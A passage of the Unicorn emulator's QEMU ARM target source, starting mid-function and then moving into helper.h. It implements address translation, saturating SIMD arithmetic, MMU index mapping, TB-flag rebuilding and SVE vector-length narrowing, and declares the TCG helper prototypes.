mmu_idx); if (arm_el_is_aa64(env, r_el)) { int pamax = arm_pamax(env_archcpu(env)); uint64_t tcr = env->cp15.tcr_el[r_el].raw_tcr; int addrtop, tbi; tbi = aa64_va_parameter_tbi(tcr, mmu_idx); if (access_type == MMU_INST_FETCH) { tbi &= ~aa64_va_parameter_tbid(tcr, mmu_idx); } tbi = (tbi >> extract64(address, 55, 1)) & 1; addrtop = (tbi ? 55 : 63); if (extract64(address, pamax, addrtop - pamax + 1) != 0) { fi->type = ARMFault_AddressSize; fi->level = 0; fi->stage2 = false; return true; } /* * When TBI is disabled, we've just validated that all of the * bits above PAMax are zero, so logically we only need to * clear the top byte for TBI. But it's clearer to follow * the pseudocode set of addrdesc.paddress. */ address = extract64(address, 0, 52); } } *phys_ptr = address; *prot = PAGE_READ | PAGE_WRITE | PAGE_EXEC; *page_size = TARGET_PAGE_SIZE; return false; } if (regime_using_lpae_format(env, mmu_idx)) { return get_phys_addr_lpae(env, address, access_type, mmu_idx, phys_ptr, attrs, prot, page_size, fi, cacheattrs); } else if (regime_sctlr(env, mmu_idx) & SCTLR_XP) { return get_phys_addr_v6(env, address, access_type, mmu_idx, phys_ptr, attrs, prot, page_size, fi); } else { return get_phys_addr_v5(env, address, access_type, mmu_idx, phys_ptr, prot, page_size, fi); } } hwaddr arm_cpu_get_phys_page_attrs_debug(CPUState *cs, vaddr addr, MemTxAttrs *attrs) { ARMCPU *cpu = ARM_CPU(cs); CPUARMState *env = &cpu->env; hwaddr phys_addr; target_ulong page_size; int prot; bool ret; ARMMMUFaultInfo fi = { 0 }; ARMMMUIdx mmu_idx = arm_mmu_idx(env); *attrs = (MemTxAttrs) { 0 }; ret = get_phys_addr(env, addr, MMU_DATA_LOAD, mmu_idx, &phys_addr, attrs, &prot, &page_size, &fi, NULL); if (ret) { return -1; } return phys_addr; } /* Note that signed overflow is undefined in C. The following routines are careful to use unsigned types where modulo arithmetic is required. Failure to do so _will_ break on newer gcc. */ /* Signed saturating arithmetic. */ /* Perform 16-bit signed saturating addition.
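* Worked example: 0x7fff + 0x0001 overflows positively and saturates to 0x7fff, while 0x8000 + 0x8000 (-32768 + -32768) saturates to 0x8000; both trip the sign-flip test below.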
*/ static inline uint16_t add16_sat(uint16_t a, uint16_t b) { uint16_t res; res = a + b; if (((res ^ a) & 0x8000) && !((a ^ b) & 0x8000)) { if (a & 0x8000) res = 0x8000; else res = 0x7fff; } return res; } /* Perform 8-bit signed saturating addition. */ static inline uint8_t add8_sat(uint8_t a, uint8_t b) { uint8_t res; res = a + b; if (((res ^ a) & 0x80) && !((a ^ b) & 0x80)) { if (a & 0x80) res = 0x80; else res = 0x7f; } return res; } /* Perform 16-bit signed saturating subtraction. */ static inline uint16_t sub16_sat(uint16_t a, uint16_t b) { uint16_t res; res = a - b; if (((res ^ a) & 0x8000) && ((a ^ b) & 0x8000)) { if (a & 0x8000) res = 0x8000; else res = 0x7fff; } return res; } /* Perform 8-bit signed saturating subtraction. */ static inline uint8_t sub8_sat(uint8_t a, uint8_t b) { uint8_t res; res = a - b; if (((res ^ a) & 0x80) && ((a ^ b) & 0x80)) { if (a & 0x80) res = 0x80; else res = 0x7f; } return res; } #define ADD16(a, b, n) RESULT(add16_sat(a, b), n, 16); #define SUB16(a, b, n) RESULT(sub16_sat(a, b), n, 16); #define ADD8(a, b, n) RESULT(add8_sat(a, b), n, 8); #define SUB8(a, b, n) RESULT(sub8_sat(a, b), n, 8); #define PFX q #include "op_addsub.h" /* Unsigned saturating arithmetic. */ static inline uint16_t add16_usat(uint16_t a, uint16_t b) { uint16_t res; res = a + b; if (res < a) res = 0xffff; return res; } static inline uint16_t sub16_usat(uint16_t a, uint16_t b) { if (a > b) return a - b; else return 0; } static inline uint8_t add8_usat(uint8_t a, uint8_t b) { uint8_t res; res = a + b; if (res < a) res = 0xff; return res; } static inline uint8_t sub8_usat(uint8_t a, uint8_t b) { if (a > b) return a - b; else return 0; } #define ADD16(a, b, n) RESULT(add16_usat(a, b), n, 16); #define SUB16(a, b, n) RESULT(sub16_usat(a, b), n, 16); #define ADD8(a, b, n) RESULT(add8_usat(a, b), n, 8); #define SUB8(a, b, n) RESULT(sub8_usat(a, b), n, 8); #define PFX uq #include "op_addsub.h" /* Signed modulo arithmetic. */ #define SARITH16(a, b, n, op) do { \ int32_t sum; \ sum = (int32_t)(int16_t)(a) op (int32_t)(int16_t)(b); \ RESULT(sum, n, 16); \ if (sum >= 0) \ ge |= 3 << (n * 2); \ } while(0) #define SARITH8(a, b, n, op) do { \ int32_t sum; \ sum = (int32_t)(int8_t)(a) op (int32_t)(int8_t)(b); \ RESULT(sum, n, 8); \ if (sum >= 0) \ ge |= 1 << n; \ } while(0) #define ADD16(a, b, n) SARITH16(a, b, n, +) #define SUB16(a, b, n) SARITH16(a, b, n, -) #define ADD8(a, b, n) SARITH8(a, b, n, +) #define SUB8(a, b, n) SARITH8(a, b, n, -) #define PFX s #define ARITH_GE #include "op_addsub.h" /* Unsigned modulo arithmetic. */ #define ADD16(a, b, n) do { \ uint32_t sum; \ sum = (uint32_t)(uint16_t)(a) + (uint32_t)(uint16_t)(b); \ RESULT(sum, n, 16); \ if ((sum >> 16) == 1) \ ge |= 3 << (n * 2); \ } while(0) #define ADD8(a, b, n) do { \ uint32_t sum; \ sum = (uint32_t)(uint8_t)(a) + (uint32_t)(uint8_t)(b); \ RESULT(sum, n, 8); \ if ((sum >> 8) == 1) \ ge |= 1 << n; \ } while(0) #define SUB16(a, b, n) do { \ uint32_t sum; \ sum = (uint32_t)(uint16_t)(a) - (uint32_t)(uint16_t)(b); \ RESULT(sum, n, 16); \ if ((sum >> 16) == 0) \ ge |= 3 << (n * 2); \ } while(0) #define SUB8(a, b, n) do { \ uint32_t sum; \ sum = (uint32_t)(uint8_t)(a) - (uint32_t)(uint8_t)(b); \ RESULT(sum, n, 8); \ if ((sum >> 8) == 0) \ ge |= 1 << n; \ } while(0) #define PFX u #define ARITH_GE #include "op_addsub.h" /* Halved signed arithmetic. 
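* Worked example: the halved forms compute in 32 bits and shift right once, e.g. SHADD16 on 0x7fff and 0x0001 yields (32767 + 1) >> 1 == 0x4000, so no saturation is ever required.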
*/ #define ADD16(a, b, n) \ RESULT(((int32_t)(int16_t)(a) + (int32_t)(int16_t)(b)) >> 1, n, 16) #define SUB16(a, b, n) \ RESULT(((int32_t)(int16_t)(a) - (int32_t)(int16_t)(b)) >> 1, n, 16) #define ADD8(a, b, n) \ RESULT(((int32_t)(int8_t)(a) + (int32_t)(int8_t)(b)) >> 1, n, 8) #define SUB8(a, b, n) \ RESULT(((int32_t)(int8_t)(a) - (int32_t)(int8_t)(b)) >> 1, n, 8) #define PFX sh #include "op_addsub.h" /* Halved unsigned arithmetic. */ #define ADD16(a, b, n) \ RESULT(((uint32_t)(uint16_t)(a) + (uint32_t)(uint16_t)(b)) >> 1, n, 16) #define SUB16(a, b, n) \ RESULT(((uint32_t)(uint16_t)(a) - (uint32_t)(uint16_t)(b)) >> 1, n, 16) #define ADD8(a, b, n) \ RESULT(((uint32_t)(uint8_t)(a) + (uint32_t)(uint8_t)(b)) >> 1, n, 8) #define SUB8(a, b, n) \ RESULT(((uint32_t)(uint8_t)(a) - (uint32_t)(uint8_t)(b)) >> 1, n, 8) #define PFX uh #include "op_addsub.h" static inline uint8_t do_usad(uint8_t a, uint8_t b) { if (a > b) return a - b; else return b - a; } /* Unsigned sum of absolute byte differences. */ uint32_t HELPER(usad8)(uint32_t a, uint32_t b) { uint32_t sum; sum = do_usad(a, b); sum += do_usad(a >> 8, b >> 8); sum += do_usad(a >> 16, b >> 16); sum += do_usad(a >> 24, b >> 24); return sum; } /* For ARMv6 SEL instruction. */ uint32_t HELPER(sel_flags)(uint32_t flags, uint32_t a, uint32_t b) { uint32_t mask; mask = 0; if (flags & 1) mask |= 0xff; if (flags & 2) mask |= 0xff00; if (flags & 4) mask |= 0xff0000; if (flags & 8) mask |= 0xff000000; return (a & mask) | (b & ~mask); } /* CRC helpers. * The upper bytes of val (above the number specified by 'bytes') must have * been zeroed out by the caller. */ uint32_t HELPER(crc32)(uint32_t acc, uint32_t val, uint32_t bytes) { uint8_t buf[4]; stl_le_p(buf, val); return crc32(acc ^ 0xffffffff, buf, bytes) ^ 0xffffffff; } uint32_t HELPER(crc32c)(uint32_t acc, uint32_t val, uint32_t bytes) { uint8_t buf[4]; stl_le_p(buf, val); /* Linux crc32c converts the output to one's complement. */ return crc32c(acc, buf, bytes) ^ 0xffffffff; } /* Return the exception level to which FP-disabled exceptions should * be taken, or 0 if FP is enabled. */ int fp_exception_el(CPUARMState *env, int cur_el) { return 0; } /* Return the exception level we're running at if this is our mmu_idx */ int arm_mmu_idx_to_el(ARMMMUIdx mmu_idx) { if (mmu_idx & ARM_MMU_IDX_M) { return mmu_idx & ARM_MMU_IDX_M_PRIV; } switch (mmu_idx) { case ARMMMUIdx_E10_0: case ARMMMUIdx_E20_0: case ARMMMUIdx_SE10_0: return 0; case ARMMMUIdx_E10_1: case ARMMMUIdx_E10_1_PAN: case ARMMMUIdx_SE10_1: case ARMMMUIdx_SE10_1_PAN: return 1; case ARMMMUIdx_E2: case ARMMMUIdx_E20_2: case ARMMMUIdx_E20_2_PAN: return 2; case ARMMMUIdx_SE3: return 3; default: g_assert_not_reached(); // never reach here return 0; } } ARMMMUIdx arm_mmu_idx_el(CPUARMState *env, int el) { if (arm_feature(env, ARM_FEATURE_M)) { return arm_v7m_mmu_idx_for_secstate(env, env->v7m.secure); } /* See ARM pseudo-function ELIsInHost. */ switch (el) { case 0: if (arm_is_secure_below_el3(env)) { return ARMMMUIdx_SE10_0; } if ((env->cp15.hcr_el2 & (HCR_E2H | HCR_TGE)) == (HCR_E2H | HCR_TGE) && arm_el_is_aa64(env, 2)) { return ARMMMUIdx_E20_0; } return ARMMMUIdx_E10_0; case 1: if (arm_is_secure_below_el3(env)) { if (env->pstate & PSTATE_PAN) { return ARMMMUIdx_SE10_1_PAN; } return ARMMMUIdx_SE10_1; } if (env->pstate & PSTATE_PAN) { return ARMMMUIdx_E10_1_PAN; } return ARMMMUIdx_E10_1; case 2: /* TODO: ARMv8.4-SecEL2 */ /* Note that TGE does not apply at EL2.
*/ if ((env->cp15.hcr_el2 & HCR_E2H) && arm_el_is_aa64(env, 2)) { if (env->pstate & PSTATE_PAN) { return ARMMMUIdx_E20_2_PAN; } return ARMMMUIdx_E20_2; } return ARMMMUIdx_E2; case 3: return ARMMMUIdx_SE3; default: g_assert_not_reached(); // never reach here return 0; } } ARMMMUIdx arm_mmu_idx(CPUARMState *env) { return arm_mmu_idx_el(env, arm_current_el(env)); } ARMMMUIdx arm_stage1_mmu_idx(CPUARMState *env) { return stage_1_mmu_idx(arm_mmu_idx(env)); } static uint32_t rebuild_hflags_common(CPUARMState *env, int fp_el, ARMMMUIdx mmu_idx, uint32_t flags) { FIELD_DP32(flags, TBFLAG_ANY, FPEXC_EL, fp_el, flags); FIELD_DP32(flags, TBFLAG_ANY, MMUIDX, arm_to_core_mmu_idx(mmu_idx), flags); if (arm_singlestep_active(env)) { FIELD_DP32(flags, TBFLAG_ANY, SS_ACTIVE, 1, flags); } return flags; } static uint32_t rebuild_hflags_common_32(CPUARMState *env, int fp_el, ARMMMUIdx mmu_idx, uint32_t flags) { bool sctlr_b = arm_sctlr_b(env); if (sctlr_b) { FIELD_DP32(flags, TBFLAG_A32, SCTLR_B, 1, flags); } if (arm_cpu_data_is_big_endian_a32(env, sctlr_b)) { FIELD_DP32(flags, TBFLAG_ANY, BE_DATA, 1, flags); } FIELD_DP32(flags, TBFLAG_A32, NS, !access_secure_reg(env), flags); return rebuild_hflags_common(env, fp_el, mmu_idx, flags); } static uint32_t rebuild_hflags_m32(CPUARMState *env, int fp_el, ARMMMUIdx mmu_idx) { uint32_t flags = 0; if (arm_v7m_is_handler_mode(env)) { FIELD_DP32(flags, TBFLAG_M32, HANDLER, 1, flags); } /* * v8M always applies stack limit checks unless CCR.STKOFHFNMIGN * is suppressing them because the requested execution priority * is less than 0. */ if (arm_feature(env, ARM_FEATURE_V8) && !((mmu_idx & ARM_MMU_IDX_M_NEGPRI) && (env->v7m.ccr[env->v7m.secure] & R_V7M_CCR_STKOFHFNMIGN_MASK))) { FIELD_DP32(flags, TBFLAG_M32, STACKCHECK, 1, flags); } return rebuild_hflags_common_32(env, fp_el, mmu_idx, flags); } static uint32_t rebuild_hflags_aprofile(CPUARMState *env) { int flags = 0; FIELD_DP32(flags, TBFLAG_ANY, DEBUG_TARGET_EL, arm_debug_target_el(env), flags); return flags; } static uint32_t rebuild_hflags_a32(CPUARMState *env, int fp_el, ARMMMUIdx mmu_idx) { uint32_t flags = rebuild_hflags_aprofile(env); if (arm_el_is_aa64(env, 1)) { FIELD_DP32(flags, TBFLAG_A32, VFPEN, 1, flags); } if (arm_current_el(env) < 2 && env->cp15.hstr_el2 && (arm_hcr_el2_eff(env) & (HCR_E2H | HCR_TGE)) != (HCR_E2H | HCR_TGE)) { FIELD_DP32(flags, TBFLAG_A32, HSTR_ACTIVE, 1, flags); } return rebuild_hflags_common_32(env, fp_el, mmu_idx, flags); } static uint32_t rebuild_hflags_a64(CPUARMState *env, int el, int fp_el, ARMMMUIdx mmu_idx) { uint32_t flags = rebuild_hflags_aprofile(env); ARMMMUIdx stage1 = stage_1_mmu_idx(mmu_idx); uint64_t tcr = regime_tcr(env, mmu_idx)->raw_tcr; uint64_t sctlr; int tbii, tbid; FIELD_DP32(flags, TBFLAG_ANY, AARCH64_STATE, 1, flags); /* Get control bits for tagged addresses. */ tbid = aa64_va_parameter_tbi(tcr, mmu_idx); tbii = tbid & ~aa64_va_parameter_tbid(tcr, mmu_idx); FIELD_DP32(flags, TBFLAG_A64, TBII, tbii, flags); FIELD_DP32(flags, TBFLAG_A64, TBID, tbid, flags); if (cpu_isar_feature(aa64_sve, env_archcpu(env))) { int sve_el = sve_exception_el(env, el); uint32_t zcr_len; /* * If SVE is disabled, but FP is enabled, * then the effective len is 0. 
*/ if (sve_el != 0 && fp_el == 0) { zcr_len = 0; } else { zcr_len = sve_zcr_len_for_el(env, el); } FIELD_DP32(flags, TBFLAG_A64, SVEEXC_EL, sve_el, flags); FIELD_DP32(flags, TBFLAG_A64, ZCR_LEN, zcr_len, flags); } sctlr = regime_sctlr(env, stage1); if (arm_cpu_data_is_big_endian_a64(el, sctlr)) { FIELD_DP32(flags, TBFLAG_ANY, BE_DATA, 1, flags); } if (cpu_isar_feature(aa64_pauth, env_archcpu(env))) { /* * In order to save space in flags, we record only whether * pauth is "inactive", meaning all insns are implemented as * a nop, or "active" when some action must be performed. * The decision of which action to take is left to a helper. */ if (sctlr & (SCTLR_EnIA | SCTLR_EnIB | SCTLR_EnDA | SCTLR_EnDB)) { FIELD_DP32(flags, TBFLAG_A64, PAUTH_ACTIVE, 1, flags); } } if (cpu_isar_feature(aa64_bti, env_archcpu(env))) { /* Note that SCTLR_EL[23].BT == SCTLR_BT1. */ if (sctlr & (el == 0 ? SCTLR_BT0 : SCTLR_BT1)) { FIELD_DP32(flags, TBFLAG_A64, BT, 1, flags); } } /* Compute the condition for using AccType_UNPRIV for LDTR et al. */ if (!(env->pstate & PSTATE_UAO)) { switch (mmu_idx) { case ARMMMUIdx_E10_1: case ARMMMUIdx_E10_1_PAN: case ARMMMUIdx_SE10_1: case ARMMMUIdx_SE10_1_PAN: /* TODO: ARMv8.3-NV */ FIELD_DP32(flags, TBFLAG_A64, UNPRIV, 1, flags); break; case ARMMMUIdx_E20_2: case ARMMMUIdx_E20_2_PAN: /* TODO: ARMv8.4-SecEL2 */ /* * Note that EL20_2 is gated by HCR_EL2.E2H == 1, but EL20_0 is * gated by HCR_EL2.<E2H,TGE> == '11', and so is LDTR. */ if (env->cp15.hcr_el2 & HCR_TGE) { FIELD_DP32(flags, TBFLAG_A64, UNPRIV, 1, flags); } break; default: break; } } return rebuild_hflags_common(env, fp_el, mmu_idx, flags); } static uint32_t rebuild_hflags_internal(CPUARMState *env) { int el = arm_current_el(env); int fp_el = fp_exception_el(env, el); ARMMMUIdx mmu_idx = arm_mmu_idx_el(env, el); if (is_a64(env)) { return rebuild_hflags_a64(env, el, fp_el, mmu_idx); } else if (arm_feature(env, ARM_FEATURE_M)) { return rebuild_hflags_m32(env, fp_el, mmu_idx); } else { return rebuild_hflags_a32(env, fp_el, mmu_idx); } } void arm_rebuild_hflags(CPUARMState *env) { env->hflags = rebuild_hflags_internal(env); } /* * If we have triggered an EL state change we can't rely on the * translator having passed it to us; we need to recompute. */ void HELPER(rebuild_hflags_m32_newel)(CPUARMState *env) { int el = arm_current_el(env); int fp_el = fp_exception_el(env, el); ARMMMUIdx mmu_idx = arm_mmu_idx_el(env, el); env->hflags = rebuild_hflags_m32(env, fp_el, mmu_idx); } void HELPER(rebuild_hflags_m32)(CPUARMState *env, int el) { int fp_el = fp_exception_el(env, el); ARMMMUIdx mmu_idx = arm_mmu_idx_el(env, el); env->hflags = rebuild_hflags_m32(env, fp_el, mmu_idx); } /* * If we have triggered an EL state change we can't rely on the * translator having passed it to us; we need to recompute.
*/ void HELPER(rebuild_hflags_a32_newel)(CPUARMState *env) { int el = arm_current_el(env); int fp_el = fp_exception_el(env, el); ARMMMUIdx mmu_idx = arm_mmu_idx_el(env, el); env->hflags = rebuild_hflags_a32(env, fp_el, mmu_idx); } void HELPER(rebuild_hflags_a32)(CPUARMState *env, int el) { int fp_el = fp_exception_el(env, el); ARMMMUIdx mmu_idx = arm_mmu_idx_el(env, el); env->hflags = rebuild_hflags_a32(env, fp_el, mmu_idx); } void HELPER(rebuild_hflags_a64)(CPUARMState *env, int el) { int fp_el = fp_exception_el(env, el); ARMMMUIdx mmu_idx = arm_mmu_idx_el(env, el); env->hflags = rebuild_hflags_a64(env, el, fp_el, mmu_idx); } static inline void assert_hflags_rebuild_correctly(CPUARMState *env) { #ifdef CONFIG_DEBUG_TCG uint32_t env_flags_current = env->hflags; uint32_t env_flags_rebuilt = rebuild_hflags_internal(env); if (unlikely(env_flags_current != env_flags_rebuilt)) { fprintf(stderr, "TCG hflags mismatch (current:0x%08x rebuilt:0x%08x)\n", env_flags_current, env_flags_rebuilt); abort(); } #endif } void cpu_get_tb_cpu_state(CPUARMState *env, target_ulong *pc, target_ulong *cs_base, uint32_t *pflags) { uint32_t flags = env->hflags; uint32_t pstate_for_ss; *cs_base = 0; assert_hflags_rebuild_correctly(env); if (FIELD_EX32(flags, TBFLAG_ANY, AARCH64_STATE)) { *pc = env->pc; if (cpu_isar_feature(aa64_bti, env_archcpu(env))) { FIELD_DP32(flags, TBFLAG_A64, BTYPE, env->btype, flags); } pstate_for_ss = env->pstate; } else { *pc = env->regs[15]; if (arm_feature(env, ARM_FEATURE_M)) { if (arm_feature(env, ARM_FEATURE_M_SECURITY) && FIELD_EX32(env->v7m.fpccr[M_REG_S], V7M_FPCCR, S) != env->v7m.secure) { FIELD_DP32(flags, TBFLAG_M32, FPCCR_S_WRONG, 1, flags); } if ((env->v7m.fpccr[env->v7m.secure] & R_V7M_FPCCR_ASPEN_MASK) && (!(env->v7m.control[M_REG_S] & R_V7M_CONTROL_FPCA_MASK) || (env->v7m.secure && !(env->v7m.control[M_REG_S] & R_V7M_CONTROL_SFPA_MASK)))) { /* * ASPEN is set, but FPCA/SFPA indicate that there is no * active FP context; we must create a new FP context before * executing any FP insn. */ FIELD_DP32(flags, TBFLAG_M32, NEW_FP_CTXT_NEEDED, 1, flags); } bool is_secure = env->v7m.fpccr[M_REG_S] & R_V7M_FPCCR_S_MASK; if (env->v7m.fpccr[is_secure] & R_V7M_FPCCR_LSPACT_MASK) { FIELD_DP32(flags, TBFLAG_M32, LSPACT, 1, flags); } } else { /* * Note that XSCALE_CPAR shares bits with VECSTRIDE. * Note that VECLEN+VECSTRIDE are RES0 for M-profile. */ if (arm_feature(env, ARM_FEATURE_XSCALE)) { FIELD_DP32(flags, TBFLAG_A32, XSCALE_CPAR, env->cp15.c15_cpar, flags); } else { FIELD_DP32(flags, TBFLAG_A32, VECLEN, env->vfp.vec_len, flags); FIELD_DP32(flags, TBFLAG_A32, VECSTRIDE, env->vfp.vec_stride, flags); } if (env->vfp.xregs[ARM_VFP_FPEXC] & (1 << 30)) { FIELD_DP32(flags, TBFLAG_A32, VFPEN, 1, flags); } } FIELD_DP32(flags, TBFLAG_AM32, THUMB, env->thumb, flags); FIELD_DP32(flags, TBFLAG_AM32, CONDEXEC, env->condexec_bits, flags); pstate_for_ss = env->uncached_cpsr; } /* * The SS_ACTIVE and PSTATE_SS bits correspond to the state machine * states defined in the ARM ARM for software singlestep: * SS_ACTIVE PSTATE.SS State * 0 x Inactive (the TB flag for SS is always 0) * 1 0 Active-pending * 1 1 Active-not-pending * SS_ACTIVE is set in hflags; PSTATE_SS is computed every TB. 
*/ if (FIELD_EX32(flags, TBFLAG_ANY, SS_ACTIVE) && (pstate_for_ss & PSTATE_SS)) { FIELD_DP32(flags, TBFLAG_ANY, PSTATE_SS, 1, flags); } *pflags = flags; } #ifdef TARGET_AARCH64 /* * The manual says that when SVE is enabled and VQ is widened the * implementation is allowed to zero the previously inaccessible * portion of the registers. The corollary to that is that when * SVE is enabled and VQ is narrowed we are also allowed to zero * the now inaccessible portion of the registers. * * The intent of this is that no predicate bit beyond VQ is ever set. * Which means that some operations on predicate registers themselves * may operate on full uint64_t or even unrolled across the maximum * uint64_t[4]. Performing 4 bits of host arithmetic unconditionally * may well be cheaper than conditionals to restrict the operation * to the relevant portion of a uint16_t[16]. */ void aarch64_sve_narrow_vq(CPUARMState *env, unsigned vq) { int i, j; uint64_t pmask; assert(vq >= 1 && vq <= ARM_MAX_VQ); assert(vq <= env_archcpu(env)->sve_max_vq); /* Zap the high bits of the zregs. */ for (i = 0; i < 32; i++) { memset(&env->vfp.zregs[i].d[2 * vq], 0, 16 * (ARM_MAX_VQ - vq)); } /* Zap the high bits of the pregs and ffr. */ pmask = 0; if (vq & 3) { pmask = ~(0xffffffffffffffffULL << (16 * (vq & 3))); } for (j = vq / 4; j < ARM_MAX_VQ / 4; j++) { for (i = 0; i < 17; ++i) { env->vfp.pregs[i].p[j] &= pmask; } pmask = 0; } } /* * Notice a change in SVE vector size when changing EL. */ void aarch64_sve_change_el(CPUARMState *env, int old_el, int new_el, bool el0_a64) { ARMCPU *cpu = env_archcpu(env); int old_len, new_len; bool old_a64, new_a64; /* Nothing to do if no SVE. */ if (!cpu_isar_feature(aa64_sve, cpu)) { return; } /* Nothing to do if FP is disabled in either EL. */ if (fp_exception_el(env, old_el) || fp_exception_el(env, new_el)) { return; } /* * DDI0584A.d sec 3.2: "If SVE instructions are disabled or trapped * at ELx, or not available because the EL is in AArch32 state, then * for all purposes other than a direct read, the ZCR_ELx.LEN field * has an effective value of 0". * * Consider EL2 (aa64, vq=4) -> EL0 (aa32) -> EL1 (aa64, vq=0). * If we ignore aa32 state, we would fail to see the vq4->vq0 transition * from EL2->EL1. Thus we go ahead and narrow when entering aa32 so that * we already have the correct register contents when encountering the * vq0->vq0 transition between EL0->EL1. */ old_a64 = old_el ? arm_el_is_aa64(env, old_el) : el0_a64; old_len = (old_a64 && !sve_exception_el(env, old_el) ? sve_zcr_len_for_el(env, old_el) : 0); new_a64 = new_el ? arm_el_is_aa64(env, new_el) : el0_a64; new_len = (new_a64 && !sve_exception_el(env, new_el) ? sve_zcr_len_for_el(env, new_el) : 0); /* When changing vector length, clear inaccessible state. 
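 * Note that new_len is a ZCR_ELx.LEN-style value (vq - 1), hence
 * the narrow to new_len + 1 quadwords.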
 */
    if (new_len < old_len) {
        aarch64_sve_narrow_vq(env, new_len + 1);
    }
}
#endif
unicorn-2.1.1/qemu/target/arm/helper.h000066400000000000000000000731461467524106700176630ustar00rootroot00000000000000
DEF_HELPER_4(uc_tracecode, void, i32, i32, ptr, i64)
DEF_HELPER_6(uc_traceopcode, void, ptr, i64, i64, i32, ptr, i64)
DEF_HELPER_FLAGS_1(sxtb16, TCG_CALL_NO_RWG_SE, i32, i32)
DEF_HELPER_FLAGS_1(uxtb16, TCG_CALL_NO_RWG_SE, i32, i32)

DEF_HELPER_3(add_setq, i32, env, i32, i32)
DEF_HELPER_3(add_saturate, i32, env, i32, i32)
DEF_HELPER_3(sub_saturate, i32, env, i32, i32)
DEF_HELPER_3(add_usaturate, i32, env, i32, i32)
DEF_HELPER_3(sub_usaturate, i32, env, i32, i32)
DEF_HELPER_FLAGS_2(sdiv, TCG_CALL_NO_RWG_SE, s32, s32, s32)
DEF_HELPER_FLAGS_2(udiv, TCG_CALL_NO_RWG_SE, i32, i32, i32)
DEF_HELPER_FLAGS_1(rbit, TCG_CALL_NO_RWG_SE, i32, i32)

#define PAS_OP(pfx) \
    DEF_HELPER_3(pfx ## add8, i32, i32, i32, ptr) \
    DEF_HELPER_3(pfx ## sub8, i32, i32, i32, ptr) \
    DEF_HELPER_3(pfx ## sub16, i32, i32, i32, ptr) \
    DEF_HELPER_3(pfx ## add16, i32, i32, i32, ptr) \
    DEF_HELPER_3(pfx ## addsubx, i32, i32, i32, ptr) \
    DEF_HELPER_3(pfx ## subaddx, i32, i32, i32, ptr)

PAS_OP(s)
PAS_OP(u)
#undef PAS_OP

#define PAS_OP(pfx) \
    DEF_HELPER_2(pfx ## add8, i32, i32, i32) \
    DEF_HELPER_2(pfx ## sub8, i32, i32, i32) \
    DEF_HELPER_2(pfx ## sub16, i32, i32, i32) \
    DEF_HELPER_2(pfx ## add16, i32, i32, i32) \
    DEF_HELPER_2(pfx ## addsubx, i32, i32, i32) \
    DEF_HELPER_2(pfx ## subaddx, i32, i32, i32)

PAS_OP(q)
PAS_OP(sh)
PAS_OP(uq)
PAS_OP(uh)
#undef PAS_OP

DEF_HELPER_3(ssat, i32, env, i32, i32)
DEF_HELPER_3(usat, i32, env, i32, i32)
DEF_HELPER_3(ssat16, i32, env, i32, i32)
DEF_HELPER_3(usat16, i32, env, i32, i32)

DEF_HELPER_FLAGS_2(usad8, TCG_CALL_NO_RWG_SE, i32, i32, i32)

DEF_HELPER_FLAGS_3(sel_flags, TCG_CALL_NO_RWG_SE, i32, i32, i32, i32)
DEF_HELPER_2(exception_internal, void, env, i32)
DEF_HELPER_4(exception_with_syndrome, void, env, i32, i32, i32)
DEF_HELPER_2(exception_bkpt_insn, void, env, i32)
DEF_HELPER_1(setend, void, env)
DEF_HELPER_2(wfi, void, env, i32)
DEF_HELPER_1(wfe, void, env)
DEF_HELPER_1(yield, void, env)
DEF_HELPER_1(pre_hvc, void, env)
DEF_HELPER_2(pre_smc, void, env, i32)
DEF_HELPER_1(check_breakpoints, void, env)

DEF_HELPER_3(cpsr_write, void, env, i32, i32)
DEF_HELPER_2(cpsr_write_eret, void, env, i32)
DEF_HELPER_1(cpsr_read, i32, env)

DEF_HELPER_3(v7m_msr, void, env, i32, i32)
DEF_HELPER_2(v7m_mrs, i32, env, i32)

DEF_HELPER_2(v7m_bxns, void, env, i32)
DEF_HELPER_2(v7m_blxns, void, env, i32)

DEF_HELPER_3(v7m_tt, i32, env, i32, i32)

DEF_HELPER_1(v7m_preserve_fp_state, void, env)

DEF_HELPER_2(v7m_vlstm, void, env, i32)
DEF_HELPER_2(v7m_vlldm, void, env, i32)

DEF_HELPER_2(v8m_stackcheck, void, env, i32)
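/*
 * A note on the declarations in this file: DEF_HELPER_N(name, ret,
 * arg1, ..., argN) declares HELPER(name) with the given TCG types
 * (i32/i64/s32/f32/f64/ptr/env).  DEF_HELPER_FLAGS_N additionally
 * records TCG call flags, e.g. TCG_CALL_NO_RWG (the helper neither
 * reads nor writes TCG globals) and TCG_CALL_NO_RWG_SE (additionally
 * free of side effects), which let the optimizer keep values live
 * across the call.
 */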
DEF_HELPER_4(access_check_cp_reg, void, env, ptr, i32, i32) DEF_HELPER_3(set_cp_reg, void, env, ptr, i32) DEF_HELPER_2(get_cp_reg, i32, env, ptr) DEF_HELPER_3(set_cp_reg64, void, env, ptr, i64) DEF_HELPER_2(get_cp_reg64, i64, env, ptr) DEF_HELPER_3(uc_hooksys64, i32, env, i32, ptr) DEF_HELPER_2(get_r13_banked, i32, env, i32) DEF_HELPER_3(set_r13_banked, void, env, i32, i32) DEF_HELPER_3(mrs_banked, i32, env, i32, i32) DEF_HELPER_4(msr_banked, void, env, i32, i32, i32) DEF_HELPER_2(get_user_reg, i32, env, i32) DEF_HELPER_3(set_user_reg, void, env, i32, i32) DEF_HELPER_FLAGS_1(rebuild_hflags_m32_newel, TCG_CALL_NO_RWG, void, env) DEF_HELPER_FLAGS_2(rebuild_hflags_m32, TCG_CALL_NO_RWG, void, env, int) DEF_HELPER_FLAGS_1(rebuild_hflags_a32_newel, TCG_CALL_NO_RWG, void, env) DEF_HELPER_FLAGS_2(rebuild_hflags_a32, TCG_CALL_NO_RWG, void, env, int) DEF_HELPER_FLAGS_2(rebuild_hflags_a64, TCG_CALL_NO_RWG, void, env, int) DEF_HELPER_1(vfp_get_fpscr, i32, env) DEF_HELPER_2(vfp_set_fpscr, void, env, i32) DEF_HELPER_3(vfp_adds, f32, f32, f32, ptr) DEF_HELPER_3(vfp_addd, f64, f64, f64, ptr) DEF_HELPER_3(vfp_subs, f32, f32, f32, ptr) DEF_HELPER_3(vfp_subd, f64, f64, f64, ptr) DEF_HELPER_3(vfp_muls, f32, f32, f32, ptr) DEF_HELPER_3(vfp_muld, f64, f64, f64, ptr) DEF_HELPER_3(vfp_divs, f32, f32, f32, ptr) DEF_HELPER_3(vfp_divd, f64, f64, f64, ptr) DEF_HELPER_3(vfp_maxs, f32, f32, f32, ptr) DEF_HELPER_3(vfp_maxd, f64, f64, f64, ptr) DEF_HELPER_3(vfp_mins, f32, f32, f32, ptr) 